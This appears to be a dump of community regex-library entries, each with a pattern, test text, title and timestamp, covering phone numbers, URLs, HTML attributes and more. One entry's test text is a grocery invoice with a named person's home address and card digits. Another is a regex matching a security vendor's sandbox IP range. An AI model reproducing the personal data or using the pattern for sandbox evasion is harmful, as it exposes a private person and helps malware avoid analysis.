Organic Dark Sweet Cherries, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: 365 Everyday Value, Organic Sliced Peaches, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $2.79 Condition: New 1 of: Siete Traditional Hot Sauce, 5 oz Bottle (1-Pack) -Whole30 Approved & Vegan Friendly -Classic Taquería Sauce with Flax, Chia & ACV Sold by: Whole Foods Market (seller profile) $5.69 Condition: New 1 of: Rhythm Superfoods Organic Kale Chips, Original, 2 oz, Packaging May Vary Sold by: Whole Foods Market (seller profile) $3.15 Condition: New 1 of: Brads Raw, Crunchy Kale Cheeze It Up, 2 Ounce Sold by: Whole Foods Market (seller profile) $3.59 Condition: New 2 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 3 of: Mini Babybel Cheese, Original, 6 Count Sold by: Whole Foods Market (seller profile) $2.24 Condition: New 1 of: 365 Everyday Value, Organic Walnuts, Halves & Pieces, 10 oz Sold by: Whole Foods Market (seller profile) $8.99 Print this page for your records. Condition: New 1 of: Cabot Seriously Sharp Cheddar Cheese, 8 oz Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: Gardein Seven Grain Crispy Tenders, Meatless Protein Packed Strips, Ready in 8 Minutes, 9 Ounces (Frozen) Sold by: Whole Foods Market (seller profile) $4.79 Condition: New 1 of: Nuggets Vegan General TSO Fresh Pack, 24 Ounce Sold by: Whole Foods Market (seller profile) $14.99 Condition: New 1 of: ParmCrisps, Sesame, 1.75 Ounce Bag Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 0.55 lb of: Dutch Cheese Makers, Gouda 36 Month Sold by: Whole Foods Market (seller profile) ($18.99/lb $10.44 Condition: New 4 of: GT's Kombucha, Gingerberry 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 1 of: Siete Chipotle Hot Sauce, 1-Pack, 5 oz Bottles -Whole30 Approved & Vegan Friendly -Smoky Taquería Sauce with Flax, Chia & ACV Sold by: Whole Foods Market (seller profile) $5.69 Condition: New 1 of: 365 by Whole Foods Market, Frozen Organic Wild Blueberries, 32 Ounce Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 2 of: Kitu Super Coffee, SugarFree Keto Coffee (0g Added Sugar, 10g Protein, 80 Calories) [Hazelnut] 12 Fl Oz, 1 Pack | Iced Coffee, Protein Coffee, Coffee Drinks -LactoseFree, SoyFree, GlutenFree Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1 of: From The Ground Up, Cauliflower Crackers Sea Salt, 4 Ounce Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 2 of: Harrisburg Dairies, Half And Half, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $1.49 Condition: New 1 of: Parmcrisps, Crisps Cheddar, 1.75 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 2 of: 365 Everyday Value, Organic Almonds, Roasted & Salted, 10 oz $7.99 Sold by: Whole Foods Market (seller profile) Condition: New 0.53 lb of: Chix Mock General TSO Vegan Chef's Case Sold by: Whole Foods Market (seller profile) ($11.99/lb $6.35 Condition: New 1 of: Stacy's Cheese Petites White Cheddar With Jalapeno, 4 Oz Sold by: Whole Foods Market (seller profile) $4.49 Condition: New 1 of: Moon Cheese -100% Natural Cheese Snack -Gouda -2 oz Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 2 of: 365 Everyday Value, Organic Berry Blend, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 0.66 lb of: Spring Koe, Gouda Creamy Red Wax Sold by: Whole Foods Market (seller profile) ($6.99/lb $4.61 Condition: New 1 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 1 of: Hu Kitchen, Cracker Everything Grain Free Vegan, 4.25 Ounce Sold by: Whole Foods Market (seller profile) $5.99 Condition: New 1 of: 365 Everyday Value, Broccoli Florets, 12 oz Sold by: Whole Foods Market (seller profile) $2.49 Condition: New 1 of: Evolved Chocolate -Organic Keto Chocolate Bar, Midnight Coconut, 100% Cacao -Keto, Dairy-Free, Soy-Free, Paleo Friendly, Vegan Friendly, No Added Sugar, Dark Chocolate -2.3 oz each (8 Count) Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1 of: Barnana Organic Chewy Banana Bites, Original, 3.5 Ounce (Pack of 1) Packaging May Vary Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 0.46 lb of: Emmi Roth, Gouda 3 Chili Pepper Sold by: Whole Foods Market (seller profile) ($13.99/lb $6.44 Condition: New 1 of: ParmCrisps Original Flavor, 1.75 oz Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 1 of: Stacy's Cheese Petites Parmesan with Rosemary, 4oz Bag $4.49 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Blueberries, 12 oz, (Frozen) $2.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Naked Truth, Flame-Grilled Chicken Breast Fillets, 10 oz (Frozen) $6.99 Sold by: Whole Foods Market (seller profile) Condition: New 0.55 lb of: Ile De France, Blue Saint Agur ($24.99/lb Sold by: Whole Foods Market (seller profile) $13.74 Condition: New 1 of: ParmCrisps, Jalapeno, 1.75 Ounce Bag $2.70 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $244.34 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $244.34Brian J Coady Estimated tax to be collected: $0.711454 Monroe St. NW Washington, DC 20010 Tip (optional): 10.00United States Grand Total:$255.05 Credit Card transactions AmazonPLCC ending in 3157: September 3, 2020: $10.00 AmazonPLCC ending in 3157: September 1, 2020:$245.05 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary.
ParsingAmazonInvoice
2021-04-11T19:28:40.000Z
^[a-z][a-z0-9\-]+$
123341241231512313123 asd1234124 asdw-fawtaw-dwae A-sdwqw ADsdwdw asd.dwqwr.qwr.d sdwq-sdwa-r_wr
k8s 名称
2018-10-08T11:06:24.000Z
vamsi
vasmi vamsi avamsi
regex
2019-02-21T10:45:12.000Z
^(https?:\/\/)?([a-zA-z0-9\-]+)(\.[a-zA-z0-9\-]+)+:?[1-9]?[0-9]*\/.*$
http://vubpaperboy.com/asdjn?rtrwt=asdahb https://vubpaperboy.com/asdjn?rtrwt=asdahb vubpaperboy.com/asdjn?rtrwt=asdahb http://asdafyg.vubpaperboy.com/asdjn?rtrwt=asdahb https://38trbfgbg54.vubpaperboy.com/asdjn?rtrwt=asdahb qw478t487.vubpaperboy.com/asdjn?rtrwt=asdahb https://subdomain.localhost:8000/ subdomain.localhost:8000/ http://u7otqmedxrm4c.eris-sascha:13081/portal/pb/index.xhtml http://u7otqmedxrm4c.eris-sascha:13081/portal/pb/403.xhtml
subdomain catcher
2018-07-11T05:43:44.000Z
As 'time' input doesn't have a [pattern] attribute, you can check its value with this RegExp. You must provide hours and minutes. Seconds and milliseconds are optional. To "activate" seconds on the input, give it the step="" attribute with a number reprensenting the incrementation in seconds. To "activate" milliseconds on the input, set the step attribute to "0.001"
^(0\d|1\d|2[0-4]):(0\d|[1-5]\d)(?::(0\d|[1-5]\d))?(?:.(00\d|0[1-9]\d|[1-9]\d{2}))?$
Format : [hours]:[minutes]:[seconds].[milliseconds] 21:21:21.123 21:21:21 21:21
<input type="time" /> pattern
2022-01-25T14:51:13.000Z
### Telegram bot deep linking Telegram bots have a [deep linking](https://en.wikipedia.org/wiki/Deep_linking) mechanism, that allows for passing additional parameters to the bot on startup. It could be a command that launches the bot — or an auth token to connect the user's Telegram account to their account on some external service. Each bot has a link that opens a conversation with it in Telegram — `https://telegram.me/<bot username>` You can add the parameters **start** or **startgroup** to this link, with values up to **64 characters** long. For example: `https://telegram.me/triviabot?startgroup=test` `A-Z`, `a-z`, `0-9`, `_` and `-` are allowed. your bot will receive a message from that user in this format: `/start PAYLOAD`
^\/start ([a-zA-Z0-9_-]{1,64})$
Telegram bot deep linking
2017-06-23T09:24:17.000Z
Useful for phone number extraction
(([\+]?[ 0-9]{1,6}([ \.\-])?)?([\(]{1}[ +0-9]{2,6}[\)])?([ 0-9A-Z\.\-]{1,32})([0-9]+))|((e|x|ex|ext|extension)(\.|\:)?([ ]{1})?[0-9]+)
(800)-333-98171x1 x23445 "fsdfsdf ".(800)-333-9817 ext.1323 sdfsdf "fsdfsdf ".(800)-333-9817 ext1323 sdfsdf "fsdfsdf ".(800)-333-9817 ext 1323 sdfsdf "fsdfsdf ".(800)-333-9817x1323 sdfsdf "fsdfsdf ".(800)-333-9817 x1323 sdfsdf +86-400-660-8680 +86-400-660-8680 +1 888 204 3539 1-800-667-6389 +1-400-660-8680 (877) 359-6695 800-692-7753 0365987456 +3342568795 05987213 +33 321 82 c6270b003187a8a0736d8702cef6c2f9 3a8f3c208157c0ff22fc17a13615b210 9e5583ef9c65461cc06911e03fab4ac6 Call me back at 800-289-2583 as soon as possible Welcome to RegExr v2.1 by gskinner.com, proudly hosted by Media Temple! Edit the Expression & Text to see matches. Roll over matches or the expression for details. Undo mistakes with ctrl-z. Save Favorites & Share expressions with friends or the Community. Explore your results with Tools. A full Reference & Help is available in the Library, or watch the video Tutorial. Sample text for testing: abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789 _+-.,!@#$%^&*();\/|<>"' 12345 -98.7 3.141 .6180 9,000 +42 sd 555.123.4567 +1-(800)-555-2468 sfsd [email protected] [email protected] www.demo.com http://foo.co.uk/ http://regexr.com/foo.html?q=bar https://mediatemple.net 415-555-1234 150-555-2345 (416)555-3456 202 555 4567 4035555678 +44203000555 416.555.9292 Positive: +42 555.123.4567 +1-(800)-123-4567 +7 555 1234567 +7(926)1234567 (926) 1234567 +79261234567 926 1234567 9261234567 1234567 123-4567 123-89-01 495 1234567 469 123 45 67 89261234567 8 (926) 1234567 926.123.4567 415-555-1234 650-555-2345 (416)555-3456 202 555 4567 4035555678 1 416 555 9292 Asterisk SIP Trunking - US — Wholesale Reseller User Portal and Admin Portal. With this service you can customize your own Admin and User portal to sell SIP Trunk Services to your end users. This means that you can set your own rates to your customers, your admin portal will charge your customers in real-time so you never have to chase your money. All services are turned up in real-time for your end users. This includes DID ordering, SIP Trunks, vFAX and all other telecom related services. This is the ultimate reseller portal program. As for the requirements you must have an Authorize.net Account and subscribe to the CIM for remote PCI protection of credit card numbers. When your customers pay the money is sent to your bank for each nightly batch settlement. The funds are transferred directly to you and our services are billed to your account at a wholesale rate. Call now: 877-686-4787 or visit us: Asterisk SIP Trunking - US The hardest part of running an online VoIP Business is billing your clients with accurate records. We solved this! No contractual agreement or term with ramp up period required. 11234567890 123-456-7890 (123) 456-7890 1 (123) 456-7890 123 456 7890 1 123 456 7890 123.456.7890 1 123.456.7890 1.123.456.7890 +1 123.456.7890 +91 (123) 456-7890 +1-(800)-555-2468 1-234-567-8912 +22-432-359-3687 202 456 1111 (202) 456 1111 2024561111 1-202-456-1111 1-202-456-1111 x1234 1-202-456-1111 ext1234 1 (202) 456-1111 1.202.456.1111 1/202/456/1111 12024561111 +1 202 456 1111 00 1 513-573-7912 415-555-1234 650-555-2345 (416)555-3456 202 555 4567 4035555678 1 416 555 9292 9999999999 (99)9999-9999 (99) 9999-9999 99999999999 (99)99999-9999 (99) 99999-9999 09999999999 (099)9999-9999 (099) 9999-9999 099999999999 (099)99999-9999 (099) 99999-9999 9999999999 (99)9999 9999 (99) 9999 9999 99999999999 (99)99999 9999 (99) 99999 9999 09999999999 (099)9999 9999 (099) 9999 9999 099999999999 (099)99999 9999 (099) 99999 9999 099.99999.9999 (099)99999.9999 (099) 99999.9999 099.9999.9999 (099)9999.9999 000 0000000 000 000 0000 000 000-0000 000-000-0000 000 000 00 00 000 000 00-00 000 000-00-00 000-000-00-00 (000) 0000000 (000) 000 0000 (000) 000-0000 (000) 000 00 00 (000) 000 00-00 (000) 000-00-00 +00 00 0000000 +00 00 000 0000 +00 00 000-0000 +00 00 000-00-00 (+00) 00 0000000 (+00) 00 000 0000 (+00) 00 000-0000 (+00) 00 000-00-00 (55)95555-5555 (55)95555.5555 (55)95555 5555 (55)955555555 55-95555-5555 55.95555.5555 55 95555 5555 55955555555 (55)5555-5555 (55)5555.5555 (55)5555 5555 (55)55555555 55-5555-5555 55.5555.5555 55 5555 5555 5555555555 (055)95555-5555 (055)95555.5555 (055)95555 5555 (055)955555555 055-95555-5555 055.95555.5555 055 95555 5555 055955555555 (055)5555-5555 (055)5555.5555 (055)5555 5555 (055)55555555 055-5555-5555 055.5555.5555 055 5555 5555 05555555555 000 0000000 000 000 0000 000 000-0000 000-000-0000 000 000 00 00 000 000 00-00 000 000-00-00 000-000-00-00 (000) 0000000 (000) 000 0000 (000) 000-0000 (000) 000 00 00 (000) 000 00-00 (000) 000-00-00 +00 00 0000000 +00 00 000 0000 +00 00 000-0000 +00 00 000-00-00 (+00) 00 0000000 (+00) 00 000 0000 (+00) 00 000-0000 (+00) 00 000-00-00 Contents [hide] 1 7 digit NSNs 2 9 digit NSNs 3 10 digit NSNs 4 Caveats 5 See also 7 digit NSNs 0800 1111 0845 46 40 9 digit NSNs (016977) 2000 (016977) 3000 (01000) 00000 -- click for detailed list 0500 000000 0800 000000 10 digit NSNs (013873) 00000 (015242) 00000 (015394) 00000 (015395) 00000 (015396) 00000 (016973) 00000 (016974) 00000 (016977) 00000 (017683) 00000 (017684) 00000 (017687) 00000 (019467) 00000 (0110) 000 0000 (0101) 000 0000 (01000) 000000 (020) 0000 0000 -- click for detailed list 0300 000 0000 -- click for detailed list 055 0000 0000 056 0000 0000 070 0000 0000 07624 000000 076 0000 0000 07000 000000 0800 000 0000 -- click for detailed list 0900 000 0000 +4937202868035 0012067177925 #!perl use 5.010; use strict; use warnings; use Test::More 0.98; use Parse::PhoneNumber::ID qw(extract_id_phones parse_id_phone); test_extract( name => 'too short', args => {text=>'022 1234'}, num => 0, ); test_extract( name => 'too long', args => {text=>'022 123456789'}, num => 0, ); test_extract( name => 'pat ind+cc+karea+local+ext, local_number, area_code', args => {text=>'Hub: (+62) 22 12345678 ext 100'}, num => 1, res => [{standard=>'+62.22.12345678.ext100', province=>'jabar', area_code=>'022', ext=>'100'}], ); test_extract( name => 'pat ind+cc+prefix+local, country_code, non-id number, is_fax', args => {text=>'Fax: +65.12.123456'}, num => 1, res => [{standard=>'+65.12.123456', country_code=>'65', is_fax=>1}], ); TODO: { local $TODO = "todo"; fail("reject intl number 65-(022)-23918233"); } test_extract( name => 'pat ind+karea+local+ext', args => {text=>'Hub: 022 12345678 extension 2000'}, num => 1, res => [{standard=>'+62.22.12345678.ext2000', province=>'jabar'}], ); test_extract( name => 'pat ind+kprefix+local', args => {text=>'T.0812.123-4567'}, num => 1, res => [{standard=>'+62.812.1234567', operator=>'telkomsel'}], ); test_extract( name => 'pat ind+prefix+local, unknown prefix', args => {text=>'T.0444.123-4567'}, num => 1, res => [{standard=>'+62.444.1234567', is_cell=>0, is_land=>0}], ); test_extract( name => 'pat ind+local, without default_area_code', args => {text=>'Telp71234567'}, num => 0, ); test_extract( name => 'pat ind+local, with default_area_code, fwa area_code', args => {text=>'Tlp:71-23-4567', default_area_code=>'022'}, num => 1, res => [{standard=>'+62.22.71234567', is_cdma=>1, operator=>'telkom', product=>'flexi'}], ); test_extract( name => 'pat cc+karea+local+ext', args => {text=>'(+62) 22 12345678 ext 100'}, num => 1, res => [{standard=>'+62.22.12345678.ext100'}], ); test_extract( name => 'pat cc+prefix+local', args => {text=>'Fax: +65.12.123456'}, num => 1, res => [{standard=>'+65.12.123456'}], ); test_extract( name => 'pat kprefix+local', args => {text=>'0812.123-4567'}, num => 1, res => [{standard=>'+62.812.1234567'}], ); test_extract( name => 'pat prefix+local', args => {text=>'0444.123-4567'}, num => 1, res => [{standard=>'+62.444.1234567'}], ); test_extract( name => 'local', args => {text=>'91234567', default_area_code=>'021'}, num => 1, res => [{standard=>'+62.21.91234567'}], ); test_extract( name => 'preprocess remove spaces', args => {text=>'022 9 1 2 3 4 5 6 7', level=>6}, num => 1, res => [{standard=>'+62.22.91234567'}], ); test_extract( name => 'preprocess letters->digits', args => {text=>'022 9oool23', level=>6}, num => 1, res => [{standard=>'+62.22.9000123'}], ); test_extract( name => 'adjacent kprefix+local', args => {text=>'021-91234567/68'}, num => 2, res => [{standard=>'+62.21.91234567'}, {standard=>'+62.21.91234568'}], ); test_extract( name => 'adjacent ind+local', args => {text=>'Kontak: 9123459/60', default_area_code=>'0276'}, num => 2, res => [{standard=>'+62.276.9123459'}, {standard=>'+62.276.9123460'}], ); test_extract( name => 'prefers numbers at the end', args => {text=>'Kode 2501234 Hubungi: 2501235', default_area_code=>'022', max_numbers=>1}, num => 1, res => [{standard=>'+62.22.2501235'}], ); TODO: { local $TODO = "todo"; fail("preprocess words->digit"); # e.g.: nol (de)lapan limaenamsatuduatiga empat lima enam -> 0856 123456 } my %sample_data = ( # from PR 2011-03-07 "hny 50rbSpa&Massage,Sunda 71\nNewTeraphist+Room,91641176" => ['+62.22.91641176'], "NbDelC2D=2,9AcerAspire+Wbca\nm+DVDRW=2,3 T.082115768730" => ['+62.821.15768730'], "APV.T:022-73999999/91819999" => ['+62.22.73999999', '+62.22.91819999'], "WIDITOUR2005813-2005814" => ['+62.22.2005813', '+62.22.2005814'], "Drop Max 6Org 400Rb:7OOO9661" => ['+62.22.70009661'], "Hub:Hp:0813 9450 6959" => ['+62.813.94506959'], "MRH,GRS T.7 2 3 2 5 7 3" => ['+62.22.7232573'], "MM-A. Yani221 KavB12-7276756" => ['+62.22.7276756'], # klocal before prefix+local "HPL Mimik5211262/0818424693" => ['+62.818.424693', '+62.22.5211262'], #"022--1234567" => ['+62.'], # TODO: em dash "T:7041.0835-0812.8456.3465" => ['+62.22.70410835', '+62.812.84563465'], "T:022-70362090-08122021027" => ['+62.22.70362090', '+62.812.2021027'], "N.EYES & MP320/BMW/JAZZ/\nINV/AVZ/APV:08122121135" => ['+62.812.2121135'], "0813.8080\n1549;BANDUNG/022-72249239" => ['+62.813.80801549', '+62.22.72249239'], # num separated by newline "Soekarno Hatta 45-61151901" => ['+62.22.61151901'], # klocal before prefix+local "MB/Proc 750/1130\n71123030" => ['+62.22.71123030'], # 750/1130 is price (in thousand Rp). ); for my $t (sort keys %sample_data) { my $t_ = $t; $t_ =~ s/\n/\\n/g; my $d = $sample_data{$t}; test_extract( name => "sample data ($t_)", args => {text=>$t, default_area_code=>'022', level=>6}, num=>scalar(@$d), res=>[map {{standard=>$_}} @$d] ); } my $res = parse_id_phone(text=>'022-123-4567'); is($res->{standard}, "+62.22.1234567", "parse"); done_testing(); sub test_extract { my %args = @_; my $extract_args = $args{args}; my $res = extract_id_phones(%$extract_args); subtest "extract: $args{name}" => sub { if (defined $args{num}) { is(scalar @$res, $args{num}, "number of extracted phones"); } if ($args{res}) { for my $i (0..@{ $args{res} }-1) { my $r = $args{res}[$i]; for (keys %$r) { is($res->[$i]{$_}, $r->{$_}, "res[$i]{$_}"); } } } }; }
Phone numbers and/or extensions(relaxed)
2017-07-07T17:58:19.000Z
FireEye Sandbox IPs
^199\.16\.(196|197|198|199)\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])
FireEye Sandbox IPs
2018-03-02T16:10:46.000Z
(?:.+|.+(?::.+))
barcode or barcode list
2015-08-10T17:05:59.000Z
{.*}
1. e4 e5 2. Nf3 Nc6 3. Bb5 {This opening is called the Ruy Lopez.} a6 4. Ba4 Nf6 5. O-O Be7 6. Re1 b5 7. Bb3 d6 8. c3 O-O 9. h3 Nb8 10. d4 Nbd7 11. c4 c6 12. cxb5 axb5 13. Nc3 Bb7 14. Bg5 b4 15. Nb1 h6 16. Bh4 c5 17. dxe5 Nxe4 18. Bxe7 Qxe7 19. exd6 Qf6 20. Nbd2 Nxd6 21. Nc4 Nxc4 22. Bxc4 Nb6 23. Ne5 Rae8 24. Bxf7+ Rxf7 25. Nxf7 Rxe1+ 26. Qxe1 Kxf7 27. Qe3 Qg5 28. Qxg5 hxg5 29. b3 Ke6 30. a3 Kd6 31. axb4 cxb4 32. Ra5 Nd5 33. f3 Bc8 34. Kf2 Bf5 35. Ra7 g6 36. Ra6+ Kc5 37. Ke1 Nf4 38. g3 Nxh3 39. Kd2 Kb5 40. Rd6 Kc5 41. Ra6 Nf2 42. g4 Bd3 43. Re6 1/2-1/2
comment
2016-01-31T01:33:10.000Z
(#+\s)
"## The RSS sensor is down, synthesize the open-source sensor so we can synthesize the RSS sensor! transmitting the driver won't do anything, we need to navigate the optical EXE driver! Rerum sunt quia. Qui illo saepe inventore facilis eius doloribus. Et qui omnis. Praesentium et animi eos labore dicta et qui aut facere. Sunt maiores voluptatibus provident dolorem sed nihil velit. Ipsum rerum et et sit earum aut omnis sint unde. Inventore ullam molestiae et reiciendis. Nihil eum numquam velit eius occaecati debitis accusantium minima. Dolores nihil accusantium tempora minima ducimus. Qui impedit voluptas velit ipsa consectetur voluptatem quisquam quis porro. Aut alias qui laudantium amet pariatur. Odit explicabo in accusantium. If we override the protocol, we can get to the CSS protocol through the bluetooth CSS protocol! Occaecati quaerat laudantium asperiores. Voluptatum enim ipsum veniam beatae rem sed officia et. Enim voluptates ut quis ut rerum qui mollitia maxime aperiam. Animi molestiae atque exercitationem nemo. Reprehenderit et vel ut repudiandae velit veniam et. Eius ipsum nesciunt quo et et. In quae eaque placeat repudiandae vero. Error autem non asperiores deserunt. Similique ut numquam quo animi est et dolor explicabo quia. Eos itaque cumque unde enim amet. Enim rerum quae veniam ab. Et aut laboriosam sunt aut. Ut aut laborum sed. ## The SSL matrix is down, generate the open-source matrix so we can generate the SSL matrix! Try to synthesize the RAM card, maybe it will synthesize the solid state card! Qui voluptatem minus ut fugit sed porro odio accusamus. Itaque neque quas pariatur quia optio nesciunt et dolor dicta. Vero vel voluptates doloremque ut qui explicabo reiciendis eveniet sed. Alias qui eum. Est ea voluptatem ut maxime. Aut possimus et omnis hic ipsa dolor voluptatibus voluptas quis. Cupiditate qui harum. Sit quia non ullam voluptatem rem non esse ipsam odit. Occaecati et reiciendis aspernatur quia voluptatem soluta quod voluptatem. Quibusdam ipsa facere qui harum iusto et natus explicabo illum. Consequatur amet iure voluptas ad iusto accusamus ullam. Quisquam dicta aut. Alias animi voluptatibus facilis assumenda dolor perferendis ut. Dolorem velit tempora expedita voluptatem necessitatibus vero. You can't calculate the card without backing up the online ADP card! Magnam excepturi assumenda vel tempore placeat. Qui ea repudiandae minima. Dignissimos in porro fuga ipsum ab hic impedit velit vel. Quia vero voluptatem. Itaque minima qui recusandae at voluptas temporibus officiis repudiandae pariatur. Atque error ullam saepe magni molestiae ea esse perspiciatis. Repellendus magnam sed nobis. Iusto modi doloribus ab qui nesciunt. Placeat illo quisquam atque. Consequuntur labore dolorem et deleniti et voluptatem corporis est. Voluptas quisquam qui quo temporibus ut suscipit. Architecto illum amet odio velit ducimus commodi voluptas tempore. Velit unde omnis. Quidem voluptas necessitatibus deleniti dolore facere. ## Try to compress the SMTP protocol, maybe it will compress the cross-platform protocol! Use the neural TCP capacitor, then you can transmit the neural capacitor! Animi repudiandae voluptatum. Est quisquam assumenda. Neque rerum harum eum inventore. Vitae explicabo ab voluptatibus. Itaque adipisci molestiae impedit aut ex beatae asperiores eveniet deleniti. Praesentium dolorum voluptates est ut enim quo suscipit cupiditate. Dicta sed aperiam animi temporibus quod. Ut qui soluta distinctio eos consequatur. Illo et praesentium velit. Facilis accusantium hic quia iste et earum molestiae aut. Nobis aspernatur voluptas quibusdam qui occaecati. Quo fugiat dolor. Nam reprehenderit aut. We need to synthesize the wireless AI alarm! Alias error illo voluptas dolore sit possimus molestiae animi. Quam at ullam. Id reiciendis minus dignissimos quaerat eveniet asperiores magni velit. Adipisci quasi similique sequi totam. Dolores quidem laborum beatae pariatur inventore explicabo et aut distinctio. Sed error dolorem unde fugit eos accusantium et sequi. At officiis et. Iure vel vero voluptatem est ut qui vel dolorem. Voluptates laudantium vel sunt harum sint iure aut autem. Earum nihil dolor. Doloribus sunt qui facere. Officia ut doloribus deserunt possimus autem qui beatae illo. Maiores fuga iure commodi corrupti dolor nisi. Sint facere voluptas omnis animi voluptate sit voluptates numquam. Modi consectetur voluptate iure facilis minima aut quos tenetur perspiciatis. ## The PNG pixel is down, bypass the online pixel so we can bypass the PNG pixel! Use the open-source HDD capacitor, then you can transmit the open-source capacitor! Nemo neque esse molestiae assumenda suscipit in blanditiis explicabo aliquam. Enim et debitis cupiditate. Perspiciatis vel laudantium voluptatem eum officia voluptatem expedita harum. Praesentium recusandae magni. Nihil sapiente nisi ducimus tenetur est soluta. Animi similique tempora. Amet aspernatur cumque debitis aut. Impedit corporis cum aut laborum quod ducimus reprehenderit ab in. Facilis neque vel saepe consectetur enim ex. Ipsam dignissimos voluptas sit sed amet. Ipsum tempore in magni enim qui. Nulla accusamus non illo amet. Totam quia quibusdam deserunt quis odio numquam natus aut hic. Et aut fugit laborum sed. Voluptas beatae architecto sint placeat qui esse voluptatem recusandae. Est voluptas fugiat amet nam fuga in impedit. You can't transmit the circuit without synthesizing the neural XSS circuit! Quisquam iusto ad eveniet reiciendis iure placeat voluptate voluptates. Tempore qui quia nihil mollitia pariatur deleniti qui beatae. Vero quis accusantium exercitationem impedit. Velit ut et atque. Velit pariatur dignissimos est culpa expedita et ut. Aperiam eius id voluptatibus nemo quam deleniti aut saepe dolorum. Ea quo distinctio sapiente voluptatem dolores et. Eius debitis sunt vel ipsum minima ea. Asperiores incidunt odio quia vitae quam recusandae. Eius corporis voluptas qui ut eveniet necessitatibus. Sit rerum sit rem excepturi animi enim rerum eos aut. Quibusdam et tempora qui est. Sequi perferendis et voluptatem aut. ## Use the back-end AI transmitter, then you can program the back-end transmitter! The AGP capacitor is down, generate the cross-platform capacitor so we can generate the AGP capacitor! Impedit harum autem quo molestiae sint. Iure quod ut nam. Odit quo ea velit. Sed ad suscipit quas exercitationem molestiae. Dicta incidunt quos voluptatem consectetur autem quia veritatis. Aut temporibus occaecati unde nisi ut sapiente. Iste ad possimus ut eligendi et magni quia quos sunt. Eius qui a ex. Non ut sint nihil voluptatem in est voluptas laboriosam. Exercitationem laborum ea. Deleniti ut non natus voluptatem consectetur tempora qui laborum. I'll program the multi-byte PCI sensor, that should sensor the PCI sensor! Nemo et consequatur possimus sit sed nostrum enim eos ipsa. Quae ut in quibusdam fuga non maxime. Voluptatem enim error mollitia ut. Id mollitia quis reiciendis quidem et ducimus eveniet. Sequi saepe delectus ipsa possimus quaerat voluptatem eius rem. Unde quaerat est et ipsa veritatis nesciunt vel eos nemo. Nisi cumque molestiae nihil id. Amet velit omnis quia nobis dolorem. Animi modi optio qui eos voluptatem voluptatem nulla. Magnam sit ullam sed dolore nobis. ## Try to parse the TCP matrix, maybe it will parse the virtual matrix! We need to calculate the optical XSS system! Enim facere esse non nisi voluptas. Dolorem unde aliquam enim culpa omnis. Dolorem excepturi sed. Facilis sit dolores omnis id est qui voluptas temporibus assumenda. Neque quibusdam laboriosam inventore. Quam saepe sint nihil et quo. Non optio velit sunt labore aut tempore quia aliquam. Hic vitae sed at ex suscipit minus tempore iusto. Quo asperiores quo dolore rem velit odio. Tempora veritatis voluptas nulla esse quae suscipit placeat. Dolorem culpa et ab maiores et cumque aut sit. Use the digital PCI sensor, then you can hack the digital sensor! Aut similique suscipit qui incidunt officiis. Molestiae in excepturi corporis. Distinctio nostrum doloribus nam laborum in aspernatur porro. Nobis ratione similique necessitatibus voluptates voluptatem qui ut vel nam. Dolorum culpa enim est qui atque consequatur dolor. Natus et molestiae similique consequatur dolores explicabo aperiam. Ut aut nihil. Sunt ut ipsa accusantium nobis in ab eum quod cumque. Sequi deserunt quam numquam aliquam non ex amet exercitationem. Aut rerum amet quaerat neque. Hic amet est laudantium impedit magni molestiae. Rerum minus corporis. "
get rid of hash tag
2015-12-09T00:40:57.000Z
(?:\s+(?<attr>[\w:-]+)="(?<value>[^"]*)")
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Online regex tester and debugger: JavaScript, Python, PHP, and PCRE</title> <link href="http://fonts.googleapis.com/css?family=Open+Sans:400,700,300&amp;subset=latin" rel="stylesheet" type="text/css"> <link href="/css/style.1410257823.css" rel="stylesheet" type="text/css"> <link href="/css/tools.1410257823.css" rel="stylesheet" type="text/css"> <link data-theme-dark="/css/dark.1410257823.css" data-theme-light="/css/light.1410257823.css" href="/css/light.1410257823.css" rel="stylesheet" type="text/css" id="theme"> <link type="text/plain" rel="author" href="http://regex101.com/humans.txt"> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <link href="//netdna.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet"> <div class="asdf" id="1">here</div>
Match all attributes/values of html document
2014-09-15T14:29:52.000Z
[a-z0-9]+_reel[0-9]{2}_scn[0-9]{4}_shot[]0-9]{4}
kim_reel05_scn0101_shot0770 n74_reel05_scn0001_shot0700 ninehundred_reel05_scn0001_shot0700
http://stackoverflow.com/questions/26108562/python-regex-trying-to-cre
2014-09-29T20:50:56.000Z
Check all the numbers are same in a string.
^([0-9])\1*$
All Same Number
2016-04-21T13:39:50.000Z
email thingy
prvs\=[\w\d]+\=
prvs email thingy
2016-08-23T15:10:40.000Z
Potential malware/sheel signature
